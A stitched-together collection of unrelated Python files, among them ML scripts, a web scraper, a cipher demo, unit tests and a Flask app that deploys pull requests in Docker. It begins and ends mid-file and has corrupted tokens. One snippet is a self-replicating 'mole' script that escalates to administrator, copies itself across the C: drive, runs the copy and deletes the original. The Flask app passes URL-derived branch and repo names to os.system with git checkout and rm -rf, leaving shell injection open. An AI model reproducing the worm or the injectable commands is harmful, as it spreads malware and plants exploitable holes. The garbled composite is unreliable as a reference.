每个小格会对应C个概率值，找出最大概率对应的类别P(Class|object)，并认为小格中包含该物体或者该物体的一部分。 # 坐标w,h代表了预测的bounding box的width、height相对于整幅图像width,height的比例 target[int(ij[1]), int(ij[0]), 2:4] = wh[i] target[int(ij[1]), int(ij[0]), :2] = delta_xy # 每一个网格有两个边框 target[int(ij[1]), int(ij[0]), 7:9] = wh[i] # 长宽 # 中心坐标偏移 # 由此可得其实返回的中心坐标其实是相对左上角顶点的偏移，因此在进行预测的时候还需要进行解码 target[int(ij[1]), int(ij[0]), 5:7] = delta_xy # print('target{}'.format(target)) return target if __name__ == '__main__': image_path, label_path,label_name = make_list() label_list = make_label(label_name) bboxes = get_bbox(label_path,image_path) print(bboxes) print(len(bboxes)) # for box in bboxes: # print(box) # print(len(bboxes)) # image_path = 'D:\Python\CV\week12\week10_dataset\skypower\\6ae24597511ce627185bb26737a5a64.jpg' # img = cv2.imdecode(np.fromfile(image_path, dtype=np.uint8), -1) ## 读取图像，解决imread不能读取中文路径的问题 # cv2.namedWindow('image',cv2.WINDOW_NORMAL) # cv2.imshow('image',img) # cv2.waitKey(0)

kimport model_training import predict import Data_importer from datetime import datetime as dt def main(): tstart = dt.now() print('\nStarting with program\n') model_training.main() print('Finished training model in:\n', dt.now()-tstart) print('predicting outcome of test set:\n') bool_ = input('start predicting? Y/N?\n') if bool_=='Y': tstart2 = dt.now() predict.main() print('\nFinished predicting in:\n',dt.now()-tstart2) print('\nFinished whole program in:\n',dt.now()-tstart) print('Predictions can be found in:', Data_importer.location_lookup()["submission_path"]) if __name__=="__main__": smain()

from bs4 import BeautifulSoup from speaker import Speaker from topic import Topic from speech import Speech import urllib import re class Scraper(object): """Docstring for Scraper.""" def __init__(self): """Docstring for init.""" super(Scraper, self).__init__() def scrape(self, p): """Scrape the P.""" found_ref = p.find(attrs={'name': re.compile("_Toc")}) if (found_ref): return self.parseHeader(found_ref) else: return Speech(p.text.strip()) def parseHeader(self, ref): """Parse the Ref.""" title = ref.parent if (re.compile("(Mme|M\.)").match(title.text.strip())): return Speaker(title.text.strip()) elif re.compile("font-weight:bold").match(title['style']): return Topic(title.text.strip()) scraper = Scraper() html_object = BeautifulSoup(urllib.urlopen('http://www.assnat.qc.ca/en/travaux-parlementaires/assemblee-nationale/41-1/journal-debats/20161004/180251.html'), 'html.parser') the_ps = html_object.find("contenu").find_all('p'); # find(attrs={'name': re.compile("_Toc")}).parent.text.strip() # print(the_ps) # scraper.scrape(the_ps[0]) # scraper.scrape(the_ps[1]) # scraper.scrape(the_ps[2]) # scraper.scrape(the_ps[3]) # scraper.scrape(the_ps[4]) for x in xrange(5,9): object = scraper.scrape(the_ps[x]) if type(object) == Topic: print(object.title) elif type(object) == Speech: print(object.text) elif type(object) == Speaker: print(object.name) else: print(type(object))

""" re-write the initialization part in the CaesarCipher """ from example_cipher import CaesarCipher class CaesarCipher2(CaesarCipher): def __init__(self, shift): """this part replaces the original initialization""" self._forward_key = "".join( chr( (k+shift)%26 + ord('A') ) for k in range(26) ) # don't need the "list" symbol in: join([xxxx]) self._backward_key = "".join( chr( (k-shift)%26 + ord("A") ) for k in range(26) ) # print("ok") if __name__ == '__main__': msg = "THE EAGLE IS IN PLAY; MEET AT JOE'S" cipher = CaesarCipher2(3) coded = cipher.encrypt(msg) decoded = cipher.decrypt(coded) print(coded) print(decoded)

from random import randrange get_zero_or_one = lambda: randrange(2) def get_random(max_number): # Please implement this method # using only `get_zero_or_one` k = 0 while max_number > 2 ** k: k = k + 1 num = max_number while num >= max_number: num = 0 for i in range(0, k): num += (2 ** i) * get_zero_or_one() return num # Test numberCount = [0] * 30 i = 0 while i < 9999 : numberCount[get_random(30)] += 1 i += 1 print numberCount

import io import cmd import platform import sys import signal if platform.system() in ('Linux', 'Darwin'): import readline else: import pyreadline as readline import shlex import traceback import importlib.util from argparse import _SubParsersAction from argparse import _HelpAction, Action from contextlib import redirect_stdout # Prevent to execute exit() when help and error method in argparse.Argparser sys.exit = lambda x: None def signal_int_handler(signum, frame): print('No functions are defined for interrupt signals, see the Signals topic in the manual for more information.') exit(0) class ArgumentCmd(cmd.Cmd): argument_parser = None # ========================================================================== def __init__(self): super(ArgumentCmd, self).__init__() if 'libedit' in readline.__doc__: readline.parse_and_bind("bind ^I rl_complete") else: # for gnureadline readline.parse_and_bind("tab: complete") ArgumentCmd.read_prompt() # ========================================================================== def _do_command(self, line, *args, **kwargs): parser = self.argument_parser prog = kwargs["prog"].strip() try: command = f'{prog} {line}'.strip() spec = parser.parse_args(shlex.split(command)) if 'func' not in spec: return if any(x in command for x in ('-h', '--help')): return spec.func(spec) except TypeError: # parse_args raise exception when wrong input. return except Exception as e: traceback.print_exc() # Todo: Do something for errors return # ========================================================================== def emptyline(self): pass # ========================================================================== def postcmd(self, stop: bool, line: str) -> bool: ArgumentCmd.read_prompt() return cmd.Cmd.postcmd(self, stop, line) # ========================================================================== def complete(self, text, state): if state == 0: origline = readline.get_line_buffer() line = origline.lstrip() command, args, foo = self.parseline(line) if command == '': result = self.completedefault else: result = ArgumentCmd.get_complete_list( shlex.split(line), self.argument_parser) result = [x + ' ' for x in result] result.append(None) self.completion_matches = result try: return self.completion_matches[state] except IndexError: return None # ========================================================================== @staticmethod def get_complete_list(line, parser, result=None): if None is result: result = list() word = '' if line: word = line.pop(0) for action in parser._actions: if isinstance(action, _HelpAction): continue elif isinstance(action, _SubParsersAction): rc = [x for x in action.choices.keys() if x.startswith(word)] if 1 == len(rc) and word == rc[0]: return ArgumentCmd.get_complete_list( line, action.choices[word], list()) result += [x for x in action.choices.keys() if x.startswith(word)] elif isinstance(action, Action): result += [ x for x in action.option_strings if x.startswith(word)] else: pass return result # ========================================================================== @staticmethod def get_empty_func(_type, action, parser): def do(self, line): self._do_command(self, line, prog=action.prog) def complete(self, text, line, start_index, end_index): return self._complete_command( self, text, line, start_index, end_index) f = {'do': do, 'complete': complete} return f[_type] # ========================================================================== @classmethod def _add_functions(cls, actions, parser): for action in actions.choices.values(): with io.StringIO() as buf, redirect_stdout(buf): print(action.print_usage()) output = buf.getvalue() for _type in ('do',): command = ArgumentCmd.get_empty_func( _type, action=action, parser=parser) command.__doc__ = output command.__name__ = f"{_type}_{action.prog.split()[-1].strip()}" setattr(cls, command.__name__, classmethod(command)) # ========================================================================== @classmethod def _add_command(cls, parser): for action in parser._actions: if isinstance(action, _HelpAction): continue if isinstance(action, _SubParsersAction): ArgumentCmd._add_functions(action, parser) # ========================================================================== @classmethod def set_cli_parser(cls, parser): cls.argument_parser = parser cls._add_command(parser) # ========================================================================== @staticmethod def read_prompt(): try: with open('prompt', 'r') as f: prompt = f.read() if prompt: ArgumentCmd.prompt = prompt + ' ' except FileNotFoundError: pass return ArgumentCmd.prompt def run(cli_package): # Import user CLI package module_name = 'cli' spec = importlib.util.spec_from_file_location('cli', cli_package) module = importlib.util.module_from_spec(spec) sys.modules[module_name] = module spec.loader.exec_module(module) cli_parser = module.argument_parser() # Run CLI-Arguments command = ArgumentCmd command.set_cli_parser(cli_parser) my_cmd = command() my_cmd.cmdloop() # Signal signal.signal(signal.SIGINT, signal_int_handler)

# -*- coding: utf-8 -*- """ Created on Sat Nov 28 09:39:40 2020 @author: lakhan """ #importing libraries import numpy as np import pandas as pd import re import nltk import matplotlib.pyplot as plt #importing the data airline = pd.read_csv('airline_sentiment_analysis.csv') airline.airline_sentiment.value_counts().plot(kind='pie', autopct='%1.0f%%', colors=["red", "yellow"]) from nltk.corpus import stopwords from nltk.stem.porter import PorterStemmer corpus = [] for i in range(0, 1000): review = re.sub('[^a-zA-Z]', ' ', airline['airline_sentiment'][i]) review = review.lower() review = review.split() ps = PorterStemmer() all_stopwords = stopwords.words('english') all_stopwords.remove('not') review = [ps.stem(word) for word in review if not word in set(all_stopwords)] review = ' '.join(review) corpus.append(review) print(corpus) # Creating the Bag of Words model from sklearn.feature_extraction.text import CountVectorizer cv = CountVectorizer(max_features = 1500) X = cv.fit_transform(corpus).toarray() y = airline.iloc[:, -1].values from sklearn.compose import ColumnTransformer from sklearn.preprocessing import OneHotEncoder ct = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [1])], remainder='passthrough') corpus = np.array(ct.fit_transform(X)) #training the datasets from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(corpus, X, test_size=0.2, random_state=0) #classifier from sklearn.ensemble import RandomForestClassifier text_classifier = RandomForestClassifier(n_estimators = 200, oob_score = 'TRUE', n_jobs = -1,random_state =50, max_features = "auto", min_samples_leaf = 50) text_classifier.fit(X_train, y_train) predictions = text_classifier.predict(X_test) #predictions from sklearn.metrics import classification_report, confusion_matrix, accuracy_score matrix = confusion_matrix( y_test.argmax(axis=1), predictions.argmax(axis=1)) sentiment = classification_report(y_test ,predictions) accuracy = accuracy_score(y_test, predictions) print(matrix) print(sentiment) print(accuracy)

from .stage import PipelineStage import numpy as np import blind2pt class Blinding(PipelineStage): name = "blind" # fixed cosmological parameter sets input. # cosmosis parameter file and values file # string seed from the parameter inputs = { "2pt_extended" : ("2pt", "2pt_extended_data.fits") , "2pt_ng" : ("2pt", "2pt_NG.fits") , "2pt_g" : ("2pt", "2pt_G.fits") , } outputs = { "2pt_ng" : "2pt_NG_blinded.fits", "2pt_g" : "2pt_G_blinded.fits", "2pt_extended" : "2pt_extended_data_blinded.fits", } def __init__(self, param_file): super(Blinding,self).__init__(param_file) def run(self): blinding_string = self.params['blinding_seed'] cosm_file = self.params['shiftcosm_file'] inifor2pt = self.params['inifor2pt'] cosmdict = blind2pt.read_npzfile(cosm_file) refcosm = blind2pt.get_cosm_forind(cosmdict,0) shiftcosm = blind2pt.get_cosm_forseedstr(cosmdict,blinding_string) factordict = blind2pt.gen_blindingfactors(refcosm,shiftcosm,inifor2pt,self.input_path('2pt_g')) # ^ the only thing this uses from the input file is n(z), so if that's the same for all # input files, then you only need to do this once for file_type in ['2pt_g', '2pt_ng', '2pt_extended']: input_file = self.input_path(file_type) output_file = self.output_path(file_type) blind2pt.apply2ptblinding(factordict,input_file, inifor2pt, outfile = output_file) def write(self): pass

A = input ().split () B = input ().split () for i in range (len (A)): A [i] = int(A [i]) for j in range (len (B)): B [j] = int(B [j]) C = [] for k in range (len (A)): s = B.count (A [k]) if s > 0: C.append(A [k]) for x in range (len (C)): print(C [x], end = ' ')

class NamedObjectList(list): def __getitem__(self, key): if isinstance(key, str): for item in self: if item.name == key: return item raise IndexError('no object named {!r}'.format(key)) return list.__getitem__(self, key)

# # Copyright (C) 2018 Satoru SATOH <ssato @ redhat.com> # License: MIT # # pylint: disable=missing-docstring, invalid-name import os.path import os import unittest import anyconfig.compat import anyconfig.ioinfo as TT import anyconfig.utils from anyconfig.globals import ( IOI_PATH_STR, IOI_PATH_OBJ, IOI_STREAM, ) import tests.common as TC IPATH_0 = os.path.join(TC.resdir(), "00-cnf.json") IPATH_0_FULL = anyconfig.utils.normpath(IPATH_0) IPATH_0_EXT = anyconfig.utils.get_file_extension(IPATH_0) class Test_10_inspect_io_obj(unittest.TestCase): def test_10_path_str(self): self.assertEqual(TT.inspect_io_obj(IPATH_0), (IOI_PATH_STR, IPATH_0_FULL, open, IPATH_0_EXT)) def test_20_stream(self): self.assertEqual(TT.inspect_io_obj(open(IPATH_0)), (IOI_STREAM, IPATH_0_FULL, anyconfig.utils.noop, IPATH_0_EXT)) def test_22_stream(self): stdin = os.fdopen(0) res = TT.inspect_io_obj(stdin) self.assertEqual(res[0], IOI_STREAM) self.assertEqual(res[2], anyconfig.utils.noop) def test_30_path_obj(self): if anyconfig.compat.pathlib is None: return ipo = anyconfig.compat.pathlib.Path(IPATH_0) self.assertEqual(TT.inspect_io_obj(ipo), (IOI_PATH_OBJ, IPATH_0_FULL, ipo.open, IPATH_0_EXT)) class Test_30_make(unittest.TestCase): (ipath, ipath_full) = (IPATH_0, IPATH_0_FULL) def __init__(self, *args, **kwargs): super(Test_30_make, self).__init__(*args, **kwargs) self.fun = TT.make def __checks_helper(self, inp, *args): self.assertEqual(inp.src, args[0]) self.assertEqual(inp.path, args[1]) self.assertEqual(inp.type, args[2]) self.assertEqual(inp.opener, args[3]) self.assertEqual(inp.extension, args[4]) def test_30__by_fileext(self): res = self.fun(self.ipath) self.__checks_helper(res, self.ipath, self.ipath_full, IOI_PATH_STR, open, IPATH_0_EXT) def test_40__pathlib(self): ipath = self.ipath if anyconfig.compat.pathlib is not None: # Replace w/ pathlib.Path object. ipath = anyconfig.compat.pathlib.Path(ipath) itype = IOI_PATH_OBJ opener = ipath.open else: itype = IOI_PATH_STR opener = open res = self.fun(ipath) self.__checks_helper(res, ipath, self.ipath_full, itype, opener, IPATH_0_EXT) def test_50__stream(self): ifo = open(self.ipath) res = self.fun(ifo) self.__checks_helper(res, ifo, self.ipath_full, IOI_STREAM, anyconfig.utils.noop, IPATH_0_EXT) # vim:sw=4:ts=4:et:

from elasticsearch import Elasticsearch mappingJson = { "behave": { "_timestamp": { "enabled": True, "path": "date" }, "properties": { "date": { "type": "date" }, "duration": { "type": "string" }, "feature": { "type": "string", "index": "not_analyzed" }, "scenario": { "type": "string", "index": "not_analyzed" }, "scenario_status": { "type": "string", "index": "not_analyzed" }, "environment": { "type": "string", "index": "not_analyzed" }, "step": { "type": "string", "index": "not_analyzed" }, "step_number": { "type": "integer" }, "status": { "type": "string" } } } } host = 'http://localhost:9200' es = Elasticsearch([host]) result = es.indices.put_mapping( doc_type='behave', body=mappingJson, index=['reliability']) print(result)

#!/usr/bin/env python3.4 # encoding: utf-8 import os import sys from pymzid.pymzid import Mzid def main(): ''' Simple parser for Mzid files based on pymzl_integrator module © Johannes Leufken 2017 ''' reader = Mzid( sys.argv[1], verbose = False ) data_frame = reader.peptide_df for seq in data_frame['seq']: print(seq) return if __name__ == '__main__': main()

# -*- coding: utf-8 -*- """Classes for interactions between the TXM class and the real TXM. TxmPV A descriptor for the process variables used by the microscopes. """ import logging import datetime as dt import os import epics import numpy as np __author__ = 'Mark Wolfman' __copyright__ = 'Copyright (c) 2017, UChicago Argonne, LLC.' __docformat__ = 'restructuredtext en' __platform__ = 'Unix' __version__ = '1.6' def loggingConfig(level=logging.INFO): """Prepare a basic logging file setup with the date of the experiment.""" path = epics.caget('32idcPG3:HDF1:FilePath', as_string=True) filename = "{}.log".format(dt.date.today().isoformat()) logging.basicConfig(level=int(level), filename=os.path.join(path, filename)) def expand_position(position, length=4): """Take a tuple with length <= 4 and pad it with ``None``'s up to length. Example, if ``length=4`` and ``position=(1, 0)``, then the output is ``(1, 0, None, None)``. """ new_position = tuple(position) + (None,) * (length-len(position)) return new_position def energy_range_from_points(energy_points, energy_steps): """Convert energy ranges to a flat energy list. This function is called with a list of energy limits and spacings between those energy points: .. code:: python energy_range( energy_points=(8.3, 8.5, 8.7), energy_steps=(0.02, 0.01) ) """ # Validate the length of the lists if len(energy_points) != (len(energy_steps) + 1): raise ValueError("Number of energy points must be one more than " "number of energy steps: %d, %d" "" % (len(energy_points), len(energy_steps))) # First prepare a list of ranges ranges = [] for idx in range(len(energy_steps)): start = energy_points[idx] stop = energy_points[idx+1] step = energy_steps[idx] ranges.append((start, stop, step)) # Convert the list of ranges to a list of energies energies = energy_range(*ranges) return energies def energy_range(*ranges): """Convert energy ranges to a flat energy list. This function is called with multiple energy ranges: .. code:: python energy_range( (8.3, 8.5, 0.02), (8.5, 8.7, 0.01), ) Each entry in ``ranges`` should be a tuple of (start, stop, step). Unlike the standard ``range`` function, stop is inclusive.""" Es = [np.arange(r[0], r[1]+r[2], r[2]) for r in ranges] Es = np.concatenate(Es) Es = np.unique(Es) return Es

import os import docker import constants from flask import redirect, url_for, session, request, jsonify from git import Repo from app import app, github from config import Config from parser import parse from helpers import ( id_generator, find_free_port, get_pull_request_info, execute_testfile ) @app.route('/<owner>/<repo>/pull/<pr_no>') def index(owner, repo, pr_no): """ Redirects to authorize a user/org. :param owner: Owner of the github repository. :type owner: string :param repo: name of the github repository. :type repo: string :param pr_no: pull request no. for the repository. :type pr_no: string :return redirect object. """ if Config.users["default"] == "deny" and owner not in Config.users["allow"]: return redirect('404/Permission_Denied') elif Config.users["default"] == "allow" and owner in Config.users["deny"]: return redirect('404/Permission_Denied') else: session['repo'] = repo session['pr_no'] = pr_no session['repo_url'] = "{0}repos/{1}/{2}/pulls/{3}".format( Config.GITHUB_BASE_URL, owner, repo, pr_no ) print("logging: Authorizing github user") return redirect('/authorize') @app.route('/git_pull/<user>/<owner>/<repo>/<branch>') def git_pull_repo(user, owner, repo, branch): """ Pulls a repo from github and changes the branch. :param user: Authorized User. :type user: String :param owner: Repository Owner. :type owner: String :param repo: Name of the github repository. :type repo: String :param branch: Branch of the PR owner. :type branch: String :returns: Redirects to deploy_dind. """ oauth_token = session.get('oauth_token') print("logging: Pulling Repository from github") # name of the cloned repository on server repo_name = "{0}-{1}".format(repo, id_generator()) session['repo_name'] = repo_name try: # Clone the forked repository remote_url = constants.remote_url_string.format(user, repo) https_remote_url = constants.https_url_string.format( oauth_token, remote_url) Repo.clone_from(https_remote_url, repo_name) except KeyError: # Fork doesnot exist, Clone from main repository remote_url = constants.remote_url_string.format(owner, repo) https_remote_url = constants.https_url_string.format( oauth_token, remote_url) Repo.clone_from(https_remote_url, repo_name) print("logging: Repo pull complete") # change branch in the cloreponed repository os.chdir(repo_name) # changes dir to the cloned repo os.system('git checkout {}'.format(branch)) os.chdir('../') # change back to the pwd return redirect( url_for( 'deploy_dind', oauth_token=oauth_token, repo=repo_name, branch=branch) ) @app.route('/authorize') def authorize(): """ Authorizes user with defined scope. """ return github.authorize(scope=Config.scope) @app.route('/callback') @github.authorized_handler def authorization_callback(oauth_token): """ Callback function after user authorization. :param access_token: Authorization token for the logged in user. :type access_token: string :returns: Redirects to git-pull function. """ if oauth_token is None: return "User Not Authenticated" print("logging: User Authenticated") session['oauth_token'] = oauth_token repo = session.get('repo_url') user, owner, repo, branch = get_pull_request_info(oauth_token, repo) if (session.get('oauth_token') is True and session.get('{0}-{1}'.format(repo, branch)) is True): return redirect(session.get('{0}-{1}'.format( repo, session.get('pr_no'))) ) return redirect( url_for( 'git_pull_repo', oauth_token=oauth_token, user=user, owner=owner, repo=repo, branch=branch) ) @app.route('/deploy-dind/<repo>/<branch>') def deploy_dind(repo, branch): """ Deploys an isolated `Docker-In-Docker` environment and mounts the pulled repository to the container. :param oauth_token: Authorization token for Owner. :type oauth_token: String :param repo: Name of the cloned github repository. :type repo: String :param branch: Branch for the pull request. :type branch: String """ oauth_token = session.get('oauth_token') name = "exdous-{}".format(id_generator()) # to ssh into container use `docker exec -ti <name> /bin/sh` print("logging: Reading Testfile config") test_file_params = parse(repo, oauth_token) print("logging: Testfile config read") client = docker.from_env() try: volume = test_file_params['VOL'] vol_host = os.getcwd() + "/{}".format(repo) except KeyError: volume = '/{}'.format(repo) try: cwd = test_file_params['CWD'] except KeyError: cwd = '/' print("logging: find free port for the application") try: port = test_file_params['PORTS'] free_port = find_free_port(1)[0] except KeyError: return redirect("404/Ports_Not_Mentioned") print("logging: will accept tcp request on port: {}".format(free_port)) print("logging: deploying prmod/base-image") dind_env = client.containers.run( 'prmod/base-image', name=name, ports={port: free_port}, volumes={ vol_host: { 'bind': volume, 'mode': 'rw' } }, working_dir=cwd, privileged=True, detach=True) session['container_id'] = dind_env.id print("logging: prmod/base-image deployed") execute_testfile(dind_env, test_file_params) print("logging: application deployed on server") url = "{}:{}".format(Config.SERVER_IP, port) session['{0}-{1}'.format(repo, session.get('pr_no'))] = url return redirect(url) @app.route('/logout') def logout(): """ Clears the cloned repository, kills docker container and flushes session variables. """ client = docker.from_env() container_id = session.get('container') container = client.containers.get(container_id) repo = session.get('repo_name') print("logging: kills pulled docker image") container.kill() print("logging: removing cloned repository from server") os.system("rm -rf {}".format(repo)) print("logging: flushing session variables") session.clear() return "Logout" @app.route('/404/<error>') def not_found(error): return error if __name__ == '__main__': app.secret_key = Config.SECRET_KEY app.run(ssl_context=('cert.pem', 'key.pem'))

from django.conf.urls import patterns, url from planner import views urlpatterns = patterns( '', url(r'^$', views.PlannerHomeView.as_view(), name='planner' ), url(r'^(?P<year>[\d]+)/(?P<month>[\d]+)/(?P<day>[\d]+)/$', views.PlannerDayView.as_view(), name='planner-day' ), url(r'^redirect-to-date/$', views.RedirectToDateView.as_view(), name='redirect-to-date' ), url(r'^delete/(?P<pk>[\d]+)/$', views.DayRecipeDeleteView.as_view(), name='delete-dayrecipe' ), url(r'^(?P<year>[\d]+)/(?P<month>[\d]+)/' + '(?P<day>[\d]+)/add/(?P<meal>[\d])/$', views.DayRecipeCreateView.as_view(), name='create-dayrecipe' ), )

""" Adapted from: https://wiki.python.org/moin/Powerful%20Python%20One-Liners """ import sys pattern = sys.argv[1] substitution = sys.argv[2] line = 'My cat looks weirdly. The neighbours cat too...' print(line.replace(pattern, substitution))

# 单例设计模式：某个类或者模型在整个程序运行期间最多只能有一个对象被创建 # 我们可以判断，如果User这个类没有创建过对象，那么就创建一个对象保存在某个地方 # 以后如果要再创建对象，我会去判断，如果之前已经创建了一个对象，那么就不再创建 # 而是直接把之前那个对象返回回去 class User(object): __instance = None def __new__(cls, *args, **kwargs): if not cls.__instance: # 以下写法和python2不同 cls.__instance = super(User, cls).__new__(cls) return cls.__instance def __init__(self, name): self.name = name # @classmethod # def share_user(cls): # return User() user1 = User('aaa') user2 = User('bbb') print(user1.name) print(user2.name)

times = 0 PATH = '' import sys import subprocess import ctypes import os import random if ctypes.windll.shell32.IsUserAnAdmin(): pass else: ctypes.windll.shell32.ShellExecuteW( None, "runas", sys.executable, __file__, None, 1) sys.exit() times = times+1 this = __file__ def random_path(): dictionary = [] for x, y in enumerate(os.walk(os.path.expanduser('C:\\'))): dictionary.append(y) return random.choice(dictionary)[0] next_path = random_path()+"\\mole"+str(times)+".py" while(('Windows'in next_path)or('System'in next_path)): next_path = random_path()+"\\mole"+str(times)+".py" print(next_path) def self_copy(): with open(__file__, 'r')as this_file: this = this_file.readlines()[2:] temp = '' for x in this: temp = temp+x this = temp with open(next_path, 'w')as file: file.write('times=%s\nPATH=r"%s"\n%s' % (times, __file__, this)) def change(): try: self_copy() except: change() else: print('this is the %s mole!, at %s' %((times-1), os.path.abspath(__file__))) try: subprocess.Popen('python '+next_path) except: change() else: os.remove(__file__)

import argparse import json from sklearn.datasets import load_wine from typing import Text import yaml def data_load(config_path: Text) -> None: """Load raw data Args: config_path {Text}: path to config """ config = yaml.safe_load(open(config_path)) raw_data_path = config['data_load']['raw_data_path'] classes_names_path = config['data_load']['classes_names_path'] data = load_wine(as_frame=True) classes_names = data.target_names.tolist() dataset = data.frame dataset.columns = [colname.strip(' (cm)').replace(' ', '_') for colname in dataset.columns.tolist()] dataset.to_csv(raw_data_path, index=False) with open(classes_names_path, 'w') as classes_names_file: json.dump(obj={'classes_names': classes_names}, fp=classes_names_file) if __name__ == '__main__': args_parser = argparse.ArgumentParser() args_parser.add_argument('--config', dest='config', required=True) args = args_parser.parse_args() data_load(config_path=args.config)

import syllabifier, sys from textgrid import TextGrid import numpy as np from phn_info import vowels, consonants import argparse def gop_feat(gop_vals, textgrid_file): """ Calculate gop statistics on vowels, consonants and syllables :param gop_vals: gop values of one utterance extracted from gop files :param textgrid_file: textgrid file :return: """ textgrid = TextGrid() textgrid.read(textgrid_file) phn_seq = "" for intervals in textgrid.tiers[1]: if intervals.mark is not None: if intervals.mark != 'SIL' and intervals.mark != 'SPN': phn_seq += " " + intervals.mark language = syllabifier.English syllables = syllabifier.syllabify(language, str(phn_seq)) vowel_gop, consonants_gop, syllable_gop = [], [], [] syllable_idx = 0 # determine which syllable current phoneme is in phn_idx = 0 syllable_phn_gop = [] for intervals in textgrid.tiers[1]: # vowels and consonants if intervals.mark is not None: if intervals.mark != 'SIL' and intervals.mark != 'SPN': if intervals.mark in vowels: vowel_gop.append(gop_vals[phn_idx]) elif intervals.mark in consonants: consonants_gop.append(gop_vals[phn_idx]) else: continue # syllables if syllable_idx < len(syllables): current_syllable = syllables[syllable_idx][1] + syllables[syllable_idx][2] + syllables[syllable_idx][3] if intervals.mark is not None: if intervals.mark != 'SIL' and intervals.mark != 'SPN': if intervals.mark in current_syllable: syllable_phn_gop.append(gop_vals[phn_idx]) if intervals.mark == current_syllable[-1]: syllable_idx += 1 syllable_gop.append(np.mean(syllable_phn_gop)) syllable_phn_gop = [] if intervals.mark is not None: phn_idx += 1 if not vowel_gop: vowel_gop.append(1) if not consonants_gop: consonants_gop.append(1) if not syllable_gop: syllable_gop.append(1) return [min(vowel_gop), min(consonants_gop), min(syllable_gop), #minimum gops of vowel, consonant and syllable np.mean(vowel_gop), np.mean(consonants_gop), np.mean(syllable_gop), # average gop of vowels, consonants and syllables np.std(vowel_gop), np.std(consonants_gop), np.std(syllable_gop), # standard deviation of gops of vowels, consonants and syllables np.std(vowel_gop) / np.mean(vowel_gop), np.std(consonants_gop) / np.mean(consonants_gop), np.std(syllable_gop) / np.mean(syllable_gop), # standard deviation normalized by average ], ["gop_minV","gop_minC","gop_minSyl", "gop_avgV", "gop_avgC", "gop_avgSyl", "gop_stdV", "gop_stdC", "gop_stdSyl", "gop_VacroV", "gop_VacroC", "gop_VacroSyl", ] def gop_feat_simple(gop_vals, textgrid_file): """ Calculate gop statistics on vowels, consonants and syllables :param gop_vals: gop values of one utterance extracted from gop files :param textgrid_file: textgrid file :return: """ textgrid = TextGrid() textgrid.read(textgrid_file) phn_seq = "" for intervals in textgrid.tiers[1]: if intervals.mark is not None: if intervals.mark != 'SIL' and intervals.mark != 'SPN': phn_seq += " " + intervals.mark language = syllabifier.English syllables = syllabifier.syllabify(language, str(phn_seq)) vowel_gop, consonants_gop, syllable_gop = [], [], [] syllable_idx = 0 # determine which syllable current phoneme is in phn_idx = 0 syllable_phn_gop = [] for intervals in textgrid.tiers[1]: # vowels and consonants if intervals.mark is not None: if intervals.mark != 'SIL' and intervals.mark != 'SPN': if intervals.mark in vowels: vowel_gop.append(gop_vals[phn_idx]) elif intervals.mark in consonants: consonants_gop.append(gop_vals[phn_idx]) else: continue # syllables if syllable_idx < len(syllables): current_syllable = syllables[syllable_idx][1] + syllables[syllable_idx][2] + syllables[syllable_idx][3] if intervals.mark is not None: if intervals.mark != 'SIL' and intervals.mark != 'SPN': if intervals.mark in current_syllable: syllable_phn_gop.append(gop_vals[phn_idx]) if intervals.mark == current_syllable[-1]: syllable_idx += 1 syllable_gop.append(np.mean(syllable_phn_gop)) syllable_phn_gop = [] if intervals.mark is not None: phn_idx += 1 if not vowel_gop: vowel_gop.append(1) if not consonants_gop: consonants_gop.append(1) if not syllable_gop: syllable_gop.append(1) return [np.mean(vowel_gop), np.mean(consonants_gop), np.mean(syllable_gop)], ["gop_avgV", "gop_avgC", "gop_avgSyl"] def getUttLength(textgrid_file): textgrid = TextGrid() textgrid.read(textgrid_file) return textgrid.maxTime def processDirectories(gopFiles, alignmentdirectories, outputfile): output = open(outputfile, "a") uttlengthfile = open(outputfile.strip(".csv")+"_uttlength.csv", "a") alignDir = [] with open(alignmentdirectories, 'r') as f1: for line in f1: alignDir.append(line.strip('\n')) counter = 0 with open(gopFiles, 'r') as f2: for line in f2: gopFile = line.strip('\n') with open(gopFile,'r') as gop_fid: for eachline in gop_fid: outline = "" uttid = eachline.split()[0] #uttid spkname = uttid.split('_')[0] gop_str = eachline.split()[2:-1] # gop values in string gop_vals = [float(item) for item in gop_str] # to float numebrs textgrid_file = alignDir[counter] + '/' + uttid + '.TextGrid' # path of TextGrid file corresponding to uttid feat, descript = gop_feat_simple(gop_vals, textgrid_file) for item in feat: if item != 1 and item != 0: outline = (outline + "," + str(item)) output.write(uttid + outline + "\n") length = getUttLength(textgrid_file) uttlengthfile.write(uttid + "," + str(length) + "\n") counter += 1 output.close() uttlengthfile.close() # test if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--gop_files', help='text file with all gop files') parser.add_argument('--align_dir', help='text file with directories for all alignment files are stored') parser.add_argument('--out_dir', help='output file') args = parser.parse_args() processDirectories(args.gop_files, args.align_dir, args.out_dir) print("Done!")

# -*- coding: utf-8 -*- """ Created on Thu Jan 25 09:14:14 2018 @author: JHodges """ import time import pickle import numpy as np import xml.etree.ElementTree as ET import matplotlib.pyplot as plt import scipy.interpolate as scpi from matplotlib.colors import LinearSegmentedColormap import imageio import glob import psutil def tic(): ''' This function returns the current time. ''' return time.time() def toc(tim): ''' This function prints the time since the input time and returns the current time. ''' tom = time.time() print("%.4f sec Elapsed"%(tom-tim)) return tom def dumpPickle(data,filename): ''' This function will dump data to filename for future reuse. ''' with open(filename,'wb') as f: pickle.dump(data,f) def readPickle(filename): ''' This function will read data from filename and return it ''' with open(filename,'rb') as f: data = pickle.load(f) return data def mapTileGrid(tiles,pixels,coordFromNameFnc): ''' This function will create a larger matrix which encompasses multiple MODIS Level 3 tiles. Returns a dictionary with key = tile name and value = grid coordinates in larger matrix and the larger grid. ''' h_min = 361 h_max = -361 v_min = 361 v_max = -361 tiles_grid_dict = dict() for tile in tiles: v_tile,h_tile = coordFromNameFnc(tile) tiles_grid_dict[tile] = [h_tile,v_tile] h_min = int(h_tile) if h_tile < h_min else h_min h_max = int(h_tile) if h_tile > h_max else h_max v_min = int(v_tile) if v_tile < v_min else v_min v_max = int(v_tile) if v_tile > v_max else v_max for key in tiles_grid_dict: tiles_grid_dict[key] = list(np.array(tiles_grid_dict[key])-np.array([h_min,v_min])) tiles_grid = np.zeros((pixels*(v_max-v_min+1),pixels*(h_max-h_min+1)),dtype=np.float32) return tiles_grid_dict, tiles_grid def fillTileGrid(tile_grid,tile_grid_dict,tile,data,pixels): ''' This function will fill measurements associated with a single MODIS Level 3 tile into a previously generated larger tile 